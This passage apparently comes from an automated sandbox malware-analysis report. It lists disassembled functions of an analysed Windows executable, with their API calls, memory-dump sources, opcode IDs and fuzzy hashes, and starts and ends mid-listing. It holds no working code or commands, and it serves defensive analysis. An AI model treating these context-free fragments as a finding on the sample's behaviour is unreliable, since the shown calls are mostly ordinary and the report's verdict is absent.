                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2875609808-0
                                                                                                                                                                        • Opcode ID: 617b7a3a44150d1246ae4ebfa7887001368fff9d1d9726a65d3e80a2534070ae
                                                                                                                                                                        • Instruction ID: aab6d776ea3ae79e93e4ebbc5fbc98d9d37b22ecd85e2cf6fcb207163d2ca964
                                                                                                                                                                        • Opcode Fuzzy Hash: 617b7a3a44150d1246ae4ebfa7887001368fff9d1d9726a65d3e80a2534070ae
                                                                                                                                                                        • Instruction Fuzzy Hash: 49115E31C1052DE7CF01DFA5E94ABEEBB78BF09711F104199D985B2140DB705660CBA5
                                                                                                                                                                        Function 002F886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 002F888E
                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 002F88A6
                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 002F88CA
                                                                                                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 002F88E5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 357397906-0
                                                                                                                                                                        • Opcode ID: 73ff36480e91744fda323e1679e06dd60f8569879d25096f94d46e4a20430949
                                                                                                                                                                        • Instruction ID: 6c41626ed3796cea4e7199271fbe3fc752ee19132076c565f5d0499ab553f2c0
                                                                                                                                                                        • Opcode Fuzzy Hash: 73ff36480e91744fda323e1679e06dd60f8569879d25096f94d46e4a20430949
                                                                                                                                                                        • Instruction Fuzzy Hash: 681143B9D0020EAFDB41CF98D884AEEBBB9FB08350F504166E915E2210D735AA54CF50
                                                                                                                                                                        Function 002C36F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 002C3712
                                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 002C3723
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 002C372A
                                                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 002C3731
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2710830443-0
                                                                                                                                                                        • Opcode ID: 8e1e2b14c9c556f94b5744281686ec253f8476303d0fd4219705cd199f741693
                                                                                                                                                                        • Instruction ID: 0724c14afc228f83ba7d102ed4b1857a8adaf257673e6d351a1f60c0ba8d1435
                                                                                                                                                                        • Opcode Fuzzy Hash: 8e1e2b14c9c556f94b5744281686ec253f8476303d0fd4219705cd199f741693
                                                                                                                                                                        • Instruction Fuzzy Hash: 9BE06DB1151224BADB205BA2AC4DFFBBF6DEB42BF1F000529F109D6080DAA58944D6B0
                                                                                                                                                                        Function 002F92BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00261F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00261F87
                                                                                                                                                                          • Part of subcall function 00261F2D: SelectObject.GDI32(?,00000000), ref: 00261F96
                                                                                                                                                                          • Part of subcall function 00261F2D: BeginPath.GDI32(?), ref: 00261FAD
                                                                                                                                                                          • Part of subcall function 00261F2D: SelectObject.GDI32(?,00000000), ref: 00261FD6
                                                                                                                                                                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 002F92E3
                                                                                                                                                                        • LineTo.GDI32(?,?,?), ref: 002F92F0
                                                                                                                                                                        • EndPath.GDI32(?), ref: 002F9300
                                                                                                                                                                        • StrokePath.GDI32(?), ref: 002F930E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1539411459-0
                                                                                                                                                                        • Opcode ID: 3494549ad5cd365287ee96354465e7b28dc0ffa9bcca4f907febe426f2c3e30c
                                                                                                                                                                        • Instruction ID: 8e6e17acaea93f26022433fb36edb61e401a1718e746d45d1c9cdb0918078239
                                                                                                                                                                        • Opcode Fuzzy Hash: 3494549ad5cd365287ee96354465e7b28dc0ffa9bcca4f907febe426f2c3e30c
                                                                                                                                                                        • Instruction Fuzzy Hash: 50F05E31015259BADB125F54AC0EFDE3F5AAF0A364F048054FA15210E1C7755571DFE5
                                                                                                                                                                        Function 002621A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetSysColor.USER32(00000008), ref: 002621BC
                                                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 002621C6
                                                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 002621D9
                                                                                                                                                                        • GetStockObject.GDI32(00000005), ref: 002621E1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Color$ModeObjectStockText
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4037423528-0
                                                                                                                                                                        • Opcode ID: 0446818d5325b503bd6c6012b06846a50bf047977c866cb6c31396e367b4777d
                                                                                                                                                                        • Instruction ID: 59e9ebfcd2ced47e6fd4aa96cb621c6e707893464f298f499bfdeaa9c8b3d481
                                                                                                                                                                        • Opcode Fuzzy Hash: 0446818d5325b503bd6c6012b06846a50bf047977c866cb6c31396e367b4777d
                                                                                                                                                                        • Instruction Fuzzy Hash: 80E06531240641ABDB215F74BC0D7F97B52AB16376F14822AF7B9580E0C7724650DB10
                                                                                                                                                                        Function 002BEC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 002BEC36
                                                                                                                                                                        • GetDC.USER32(00000000), ref: 002BEC40
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 002BEC60
                                                                                                                                                                        • ReleaseDC.USER32(?), ref: 002BEC81
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                                                        • Opcode ID: 8e44b4ff793c9d5070a4fb7666b8a2e1e707f926354a5509b69c43d048831e2d
                                                                                                                                                                        • Instruction ID: 187e74deb7609ffd44ff11153dd46b874fd4109c519a0f034a743a005ca251af
                                                                                                                                                                        • Opcode Fuzzy Hash: 8e44b4ff793c9d5070a4fb7666b8a2e1e707f926354a5509b69c43d048831e2d
                                                                                                                                                                        • Instruction Fuzzy Hash: 3AE01A78810204DFCF409FA0E90CA6DBBBAEB08360F118469E80AE7251CB785951EF10
                                                                                                                                                                        Function 002BEC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 002BEC4A
                                                                                                                                                                        • GetDC.USER32(00000000), ref: 002BEC54
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 002BEC60
                                                                                                                                                                        • ReleaseDC.USER32(?), ref: 002BEC81
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                                                        • Opcode ID: fc6e7c525f556e4961c6ba20a11c82a4e71e99d3f2206e80287f7ff34ee614f7
                                                                                                                                                                        • Instruction ID: f64d64154148922cd9bfae3828e2164e5ebb252dd54575de284ff1687c901300
                                                                                                                                                                        • Opcode Fuzzy Hash: fc6e7c525f556e4961c6ba20a11c82a4e71e99d3f2206e80287f7ff34ee614f7
                                                                                                                                                                        • Instruction Fuzzy Hash: 6FE01A78C00204DFCF509FA0E90CA6DBBBAAB08360B108469E80AE7250CB786951DF10
                                                                                                                                                                        Function 002B3616 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 409COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LoadString
                                                                                                                                                                        • String ID: @COM_EVENTOBJ$bn,
                                                                                                                                                                        • API String ID: 2948472770-495244919
                                                                                                                                                                        • Opcode ID: f38661aa24295ce8da90c62f3e4c88b1ca86fd513179176fbea9fc5180392b7c
                                                                                                                                                                        • Instruction ID: 9908ae7e3010edf48f618620e000f663202807187d11ba83e90483ab3bbeaff0
                                                                                                                                                                        • Opcode Fuzzy Hash: f38661aa24295ce8da90c62f3e4c88b1ca86fd513179176fbea9fc5180392b7c
                                                                                                                                                                        • Instruction Fuzzy Hash: 7AF1CF70A283019FD714DF14C881BAAB3E1BF84754F14891DF58A9B2A1D771EAA5CF82
                                                                                                                                                                        Function 002E85DB Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002805B2: EnterCriticalSection.KERNEL32(0033170C,?,00000000,?,0026D22A,00333570,00000001,00000000,?,?,002DF023,?,?,00000000,00000001,?), ref: 002805BD
                                                                                                                                                                          • Part of subcall function 002805B2: LeaveCriticalSection.KERNEL32(0033170C,?,0026D22A,00333570,00000001,00000000,?,?,002DF023,?,?,00000000,00000001,?,00000001,00332430), ref: 002805FA
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                          • Part of subcall function 00280413: __onexit.LIBCMT ref: 00280419
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 002E8658
                                                                                                                                                                          • Part of subcall function 00280568: EnterCriticalSection.KERNEL32(0033170C,00000000,?,0026D258,00333570,002A27C9,00000001,00000000,?,?,002DF023,?,?,00000000,00000001,?), ref: 00280572
                                                                                                                                                                          • Part of subcall function 00280568: LeaveCriticalSection.KERNEL32(0033170C,?,0026D258,00333570,002A27C9,00000001,00000000,?,?,002DF023,?,?,00000000,00000001,?,00000001), ref: 002805A5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                                                                        • String ID: Variable must be of type 'Object'.$bn,
                                                                                                                                                                        • API String ID: 535116098-1341112638
                                                                                                                                                                        • Opcode ID: 3ac3e6049bd29e10dbb51c2ba6911157e1ff4478d642c0c7d701ab9b621b0005
                                                                                                                                                                        • Instruction ID: ce02a99ca17aea59e02e3144f1f2707e04e7be4487463fa7af834cd078986114
                                                                                                                                                                        • Opcode Fuzzy Hash: 3ac3e6049bd29e10dbb51c2ba6911157e1ff4478d642c0c7d701ab9b621b0005
                                                                                                                                                                        • Instruction Fuzzy Hash: 00919274A60249EFCB05EF55D891DADB7B2FF08300F908059F94AAB291DB71AE61CF50
                                                                                                                                                                        Function 002D57CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002641EA: _wcslen.LIBCMT ref: 002641EF
                                                                                                                                                                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 002D5919
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Connection_wcslen
                                                                                                                                                                        • String ID: *$LPT
                                                                                                                                                                        • API String ID: 1725874428-3443410124
                                                                                                                                                                        • Opcode ID: 43a41b773e7597c20ab72f095f2b34be706d1747c30f7456dbced76a78562aa3
                                                                                                                                                                        • Instruction ID: e985f8ce09a175bc198c2ece0dd77d8f806926c5335269583a5800447f83486a
                                                                                                                                                                        • Opcode Fuzzy Hash: 43a41b773e7597c20ab72f095f2b34be706d1747c30f7456dbced76a78562aa3
                                                                                                                                                                        • Instruction Fuzzy Hash: E791CD74A10625DFCB14DF54C4D4EAABBF1AF44304F18809AE84A9F362C7B1EE95CB90
                                                                                                                                                                        Function 002C5703 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 223comCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 002C58AF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ContainedObject
                                                                                                                                                                        • String ID: 0$3$Container
                                                                                                                                                                        • API String ID: 3565006973-1197391755
                                                                                                                                                                        • Opcode ID: eb255674c57aa6f4c3d1ffed515c937b170b6e9bcb4b9e09bb2a1015e51f325a
                                                                                                                                                                        • Instruction ID: 34362dee64d047e380fe594a0daf506b0ccfe7a13ed031b596ed096d00e55da3
                                                                                                                                                                        • Opcode Fuzzy Hash: eb255674c57aa6f4c3d1ffed515c937b170b6e9bcb4b9e09bb2a1015e51f325a
                                                                                                                                                                        • Instruction Fuzzy Hash: 21813774210611EFDB14DF54C885F6ABBF5FF48710F10866EE94A8B2A1DBB0E895CB50
                                                                                                                                                                        Function 0028E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 0028E67D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorHandling__start
                                                                                                                                                                        • String ID: pow
                                                                                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                                                                                        • Opcode ID: 94acc6056786ab79e526c646100bbb540b73d4833fe6c691dd94d4d21639c1a1
                                                                                                                                                                        • Instruction ID: def605a805bce23f78b3f50fd8c0dc7dbacb46f9115ff5378d959e0df3824e05
                                                                                                                                                                        • Opcode Fuzzy Hash: 94acc6056786ab79e526c646100bbb540b73d4833fe6c691dd94d4d21639c1a1
                                                                                                                                                                        • Instruction Fuzzy Hash: 9D51B965E3A10386CF127F14CD0136A6BACAB51700F394E59F099822E9FF718CB69B46
                                                                                                                                                                        Function 0027A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: #
                                                                                                                                                                        • API String ID: 0-1885708031
                                                                                                                                                                        • Opcode ID: ca5deb2cb55754d85d4d13ec3177939cde2978db47eeb3475918be5993abb99e
                                                                                                                                                                        • Instruction ID: 75315c143f350b0c073c609b1aaf718123f4f3320510d783d136cebe64e355b5
                                                                                                                                                                        • Opcode Fuzzy Hash: ca5deb2cb55754d85d4d13ec3177939cde2978db47eeb3475918be5993abb99e
                                                                                                                                                                        • Instruction Fuzzy Hash: F6513E31524247DFCB25DF28C041AFE7BB8AF59360F648059F9999B290DA309DB2CB61
                                                                                                                                                                        Function 0027F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 0027F6DB
                                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0027F6F4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                                                                                                        • String ID: @
                                                                                                                                                                        • API String ID: 2783356886-2766056989
                                                                                                                                                                        • Opcode ID: 28b35d72735600410dc2a9520ed3f1b2a555ec6bdae209e0d5d582037a996821
                                                                                                                                                                        • Instruction ID: 432522897aacacb0376478b02aa1eeeea2976d712dd2d604766fea8e67426dde
                                                                                                                                                                        • Opcode Fuzzy Hash: 28b35d72735600410dc2a9520ed3f1b2a555ec6bdae209e0d5d582037a996821
                                                                                                                                                                        • Instruction Fuzzy Hash: 435159714187489BD320AF54DC86BAFB7ECFB84300F81895DF5D941191EB3089B9CB66
                                                                                                                                                                        Function 002DDB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002DDB75
                                                                                                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 002DDB7F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
